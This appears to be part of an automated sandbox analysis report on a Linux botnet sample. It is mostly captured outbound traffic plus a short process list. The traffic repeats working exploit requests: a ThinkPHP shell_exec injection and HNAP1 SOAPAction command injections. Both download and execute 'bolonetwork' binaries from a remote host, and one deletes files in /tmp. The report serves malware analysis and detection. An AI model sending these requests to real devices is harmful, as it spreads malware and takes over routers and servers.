3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      142192.168.2.235608895.19.94.17180
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.912615061 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      143192.168.2.2343798119.196.179.1398081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.915613890 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      144192.168.2.2346898176.159.56.78081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.920520067 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      145192.168.2.233469895.34.132.19680
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.921972036 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      146192.168.2.234167078.220.143.1168081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.924388885 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      147192.168.2.2355072191.158.189.28081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.927774906 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      148192.168.2.233911295.119.119.5380
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.929408073 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      149192.168.2.2334960177.95.54.718081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.931157112 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      System Behavior

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:/tmp/faBNhIKHq4.elf
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):21:00:55
                                      Start date (UTC):20/07/2024
                                      Path:/tmp/faBNhIKHq4.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1